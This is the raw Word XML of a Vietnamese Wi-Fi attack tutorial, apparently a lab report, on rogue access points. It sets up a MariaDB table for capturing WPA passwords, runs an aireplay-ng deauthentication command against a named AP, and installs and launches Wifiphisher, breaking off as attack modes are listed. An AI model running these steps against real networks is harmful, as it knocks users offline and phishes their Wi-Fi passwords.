          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="455FBE72" wp14:editId="051A036B">
            <wp:extent cx="4248150" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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E8706" wp14:editId="3CC70E07">
            <wp:extent cx="3098800" cy="2099945"/>
            <wp:effectExtent l="0" t="0" r="6350" b="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0065" cy="21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3FB3" w14:textId="77777777" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20BAD874" w14:textId="471E3CE2" w:rsidR="00684D0A" w:rsidRPr="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00684D0A">
        <w:t>5. Sau đó ta tiến hành cấu hı̀nh mariadb nh</w:t>
      </w:r>
      <w:r w:rsidRPr="00684D0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="00684D0A">
        <w:t xml:space="preserve"> sau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006FCF1A" w14:textId="3651CAE9" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">mariadb </w:t>
      </w:r>
      <w:r w:rsidRPr="00684D0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -u root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6751D9" w14:textId="77777777" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB69397" w14:textId="222F4F03" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>6.Tiến</w:t>
      </w:r>
      <w:r w:rsidRPr="00684D0A">
        <w:t xml:space="preserve"> hành tạo database và bảng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1432B5EE" w14:textId="7AE221D6" w:rsidR="00684D0A" w:rsidRPr="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00684D0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>create database rogue_AP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787A303E" w14:textId="5038FCBC" w:rsidR="00684D0A" w:rsidRPr="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00684D0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use rogue_AP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF6FB10" w14:textId="3544AB03" w:rsidR="00684D0A" w:rsidRPr="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00684D0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>create table wpa_keys(password1 varchar(64), password2 varchar(64));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8175A6" w14:textId="6E013445" w:rsidR="00684D0A" w:rsidRPr="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F3F314E" wp14:editId="76536003">
            <wp:extent cx="5667375" cy="2628900"/>
            <wp:effectExtent l="0" t="0" r="952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1384" w14:textId="219B006F" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526C70A0" w14:textId="2133D3DF" w:rsidR="003D0294" w:rsidRPr="003D0294" w:rsidRDefault="003D0294" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003D0294">
        <w:t xml:space="preserve">7.Tạo user để có thể vào database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C53CB2E" w14:textId="30161031" w:rsidR="003D0294" w:rsidRDefault="003D0294" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14A7BA4F" wp14:editId="01A32ACA">
            <wp:extent cx="5991225" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="9525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0071" w14:textId="68369CA2" w:rsidR="003D0294" w:rsidRDefault="003D0294" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72715DBC" w14:textId="082C7994" w:rsidR="003D0294" w:rsidRDefault="003D0294" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003D0294">
        <w:t xml:space="preserve">8. Sau khi fake access point đãchuaßn bị hoàn </w:t>
      </w:r>
      <w:r>
        <w:t>tất</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0294">
        <w:t xml:space="preserve">, ta </w:t>
      </w:r>
      <w:r>
        <w:t>tiến</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0294">
        <w:t xml:space="preserve"> hành disconnect client đang </w:t>
      </w:r>
      <w:r>
        <w:t>kết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D40E00F" w14:textId="5C28B324" w:rsidR="003D0294" w:rsidRDefault="003D0294" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0294">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">aireplay-ng --deauth 0 -a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">74:DA:88:AD:D3:69 </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0294">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08645F6C" w14:textId="5EC87898" w:rsidR="003D0294" w:rsidRDefault="003D0294" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20F63600" wp14:editId="20825A65">
            <wp:extent cx="4981575" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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492B" w14:textId="374ECA51" w:rsidR="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B45B24" w14:textId="76196C7C" w:rsidR="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4863CD47" w14:textId="77777777" w:rsidR="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E8FB279" w14:textId="66517A2A" w:rsidR="003D0294" w:rsidRPr="001B5025" w:rsidRDefault="001B5025" w:rsidP="001B5025">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001B5025">
        <w:lastRenderedPageBreak/>
        <w:t>9. Mạng wifi mục tiêu lập tức bị đứt kết nối, client kết nối vào fake wifi. Màn hình hiển thị khi client kết nối vào fake wifi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143D9839" w14:textId="3783243D" w:rsidR="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D11F753" wp14:editId="754A09B5">
            <wp:extent cx="5353050" cy="1457325"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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D5C2" w14:textId="3D26AB06" w:rsidR="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C0A5B3" w14:textId="0F7BC9AB" w:rsidR="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0286B884" wp14:editId="217758C7">
            <wp:extent cx="6120765" cy="3074670"/>
            <wp:effectExtent l="0" t="0" r="0" b="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5959" w14:textId="5DF7B691" w:rsidR="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24F16C24" wp14:editId="5CCE56A7">
            <wp:extent cx="5419725" cy="2124075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="42" name="Picture 4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D3F0" w14:textId="187F2237" w:rsidR="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567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7BFF8C" wp14:editId="6E078A94">
            <wp:extent cx="4267200" cy="375285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54E5" w14:textId="53EFBC4D" w:rsidR="001B5025" w:rsidRPr="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001B5025">
        <w:t xml:space="preserve">=&gt; Để xem mật khẩu mà client gõ vào giao diện : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F17B356" w14:textId="1DEA0FCB" w:rsidR="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376C9166" w14:textId="47B30B17" w:rsidR="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use rogue_AP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD4414" w14:textId="74662AE6" w:rsidR="001B5025" w:rsidRPr="001B5025" w:rsidRDefault="001B5025" w:rsidP="003D0294">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001B5025">
        <w:t>=&gt;Đã thấy mật khẩu mà client nhập vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618E6F08" w14:textId="3832B93B" w:rsidR="00052098" w:rsidRPr="00A65199" w:rsidRDefault="003D0294" w:rsidP="00A65199">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00052098">
        <w:t>Nội dung 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="50FF5496" w14:textId="6B060FD8" w:rsidR="00CE48E2" w:rsidRDefault="001B5025" w:rsidP="00CE48E2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="001B5025">
        <w:t>Dùng Wifiphisher để thực hiện các cuộc tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629AC2E9" w14:textId="1E7AD9EF" w:rsidR="001B5025" w:rsidRDefault="00695F32" w:rsidP="001B5025">
      <w:r w:rsidRPr="00695F32">
        <w:t>Mở Terminal và cài đặt phần mềm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4115A8" w14:textId="77777777" w:rsidR="00695F32" w:rsidRPr="00695F32" w:rsidRDefault="00695F32" w:rsidP="00695F32">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00695F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo apt update &amp;&amp; apt install libnl-3-dev libnl-genl-3-dev libssl-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E8876E" w14:textId="77777777" w:rsidR="00695F32" w:rsidRPr="00695F32" w:rsidRDefault="00695F32" w:rsidP="00695F32">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00695F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>git clone https://github.com/wifiphisher/wifiphisher.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A03FAF" w14:textId="77777777" w:rsidR="00695F32" w:rsidRPr="00695F32" w:rsidRDefault="00695F32" w:rsidP="00695F32">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00695F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cd wifiphisher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A077AB7" w14:textId="3EB7E34F" w:rsidR="00695F32" w:rsidRPr="00695F32" w:rsidRDefault="00695F32" w:rsidP="00695F32">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00695F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo python3 setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3096F538" w14:textId="20069124" w:rsidR="00E245AA" w:rsidRDefault="00695F32" w:rsidP="00E245AA">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="050001"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A981E02" wp14:editId="18C42C1D">
            <wp:extent cx="5886450" cy="17526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DA16" w14:textId="0C3CC756" w:rsidR="00695F32" w:rsidRPr="00695F32" w:rsidRDefault="00695F32" w:rsidP="00E245AA">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="05000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2B7F547" wp14:editId="36495FC3">
            <wp:extent cx="4886325" cy="239077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6A6F" w14:textId="14F0B639" w:rsidR="00E245AA" w:rsidRPr="00695F32" w:rsidRDefault="00C77140" w:rsidP="00E245AA">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718B6792" wp14:editId="0C113518">
            <wp:extent cx="4200525" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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4FDD" w14:textId="1AAFA2BF" w:rsidR="007649C6" w:rsidRDefault="00695F32" w:rsidP="00E245AA">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00695F32">
        <w:t>Gõ lệnh “</w:t>
      </w:r>
      <w:r w:rsidRPr="00695F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00695F32">
        <w:t xml:space="preserve">” để kiểm tra card mạng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F033B19" w14:textId="1D050DD6" w:rsidR="00695F32" w:rsidRDefault="00695F32" w:rsidP="00E245AA">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61500E48" wp14:editId="5740CA8E">
            <wp:extent cx="4800600" cy="4543425"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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9E0F" w14:textId="71D4AB81" w:rsidR="00695F32" w:rsidRDefault="00695F32" w:rsidP="00E245AA">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trong bài này ta sẽ dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00695F32">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan0 </w:t>
      </w:r>
      <w:r>
        <w:t>vào monitor mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C47B56" w14:textId="3ABC554E" w:rsidR="00BC439C" w:rsidRDefault="00BC439C" w:rsidP="00E245AA">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66215A9D" w14:textId="3D5FF210" w:rsidR="00BC439C" w:rsidRPr="00BC439C" w:rsidRDefault="00BC439C" w:rsidP="00E245AA">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC439C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>airmon-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB5B2D9" w14:textId="7001A9E6" w:rsidR="00695F32" w:rsidRPr="00695F32" w:rsidRDefault="00BC439C" w:rsidP="00E245AA">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ADFC815" wp14:editId="460B73EB">
            <wp:extent cx="6105525" cy="2505075"/>
            <wp:effectExtent l="0" t="0" r="9525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C69A" w14:textId="6135C6F4" w:rsidR="007649C6" w:rsidRDefault="007649C6" w:rsidP="00E245AA">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7991E3B3" w14:textId="16115DF5" w:rsidR="003E72FD" w:rsidRDefault="00BC439C" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Nhập “</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC439C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ip a</w:t>
      </w:r>
      <w:r>
        <w:t>” để kiểm tra lại :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334E31FB" w14:textId="1D126124" w:rsidR="00BC439C" w:rsidRDefault="00BC439C" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123B863B" wp14:editId="6FD01715">
            <wp:extent cx="6120765" cy="2096135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3C1" w14:textId="51740F13" w:rsidR="00BC439C" w:rsidRDefault="00BC439C" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ở đây ta thấy </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC439C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan0mon </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC439C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan0 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thay vì </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC439C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan1 </w:t>
      </w:r>
      <w:r>
        <w:t>vì trong đây đã bật monitor mode (</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC439C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>wlan0-&gt;wlan0mon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) mà rút usb wifi ra và cắm lại nên usbwifi là </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC439C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>wlan0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C733FBD" w14:textId="4B3692F9" w:rsidR="00BC439C" w:rsidRDefault="00BC439C" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B13832" w14:textId="31320A54" w:rsidR="00FD7702" w:rsidRDefault="00FD7702" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7702">
        <w:t>hởi động phần mềm bằng lệnh wifiphisher</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bằng câu lệnh :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C314E6" w14:textId="77777777" w:rsidR="00C77140" w:rsidRDefault="00C77140" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C02A72A" w14:textId="4205BA55" w:rsidR="00FD7702" w:rsidRDefault="00176636" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00176636">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">wifiphisher -i </w:t>
      </w:r>
      <w:r w:rsidRPr="00176636">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>wlan</w:t>
      </w:r>
      <w:r w:rsidRPr="00176636">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CA359A" w14:textId="77777777" w:rsidR="00C77140" w:rsidRDefault="00C77140" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0E7872" w14:textId="4FFA0F75" w:rsidR="00C77140" w:rsidRPr="00C77140" w:rsidRDefault="00C77140" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C77140">
        <w:t>Ta sẽ thấy giao diện của wifiphisher với các mạng quét được để chúng ta tấn công . Trong bài này mạng chúng ta tấn công có thông tin là :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472FD51E" w14:textId="137B1FEF" w:rsidR="00C77140" w:rsidRPr="00C77140" w:rsidRDefault="00C77140" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C77140">
        <w:t>ESSID : NC – WPA2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7584DC94" w14:textId="77777777" w:rsidR="00C77140" w:rsidRDefault="00C77140" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372DE4BB" w14:textId="18775646" w:rsidR="00176636" w:rsidRDefault="00C77140" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="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6F2233F7" wp14:editId="545E8284">
            <wp:extent cx="6120765" cy="2947035"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715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82B0" w14:textId="11BFAAEC" w:rsidR="00C77140" w:rsidRPr="00C77140" w:rsidRDefault="00C77140" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C77140">
        <w:t xml:space="preserve">Sau khi ta chọn mạng và nhấn Enter thì sẽ có 1 bảng chọn hiện lên để chúng ta lựa chọn hình thức tấn công </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010CE5CC" w14:textId="1CF07394" w:rsidR="00C77140" w:rsidRPr="00176636" w:rsidRDefault="00C77140" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="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F8EC0BE" wp14:editId="09D1504B">
            <wp:extent cx="6120765" cy="2243455"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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856F" w14:textId="1FBB0F5C" w:rsidR="00176636" w:rsidRDefault="00C77140" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Chúng ta sẽ thực hiện 3 cách đó là :</w:t>
      </w:r>
    </w:p>
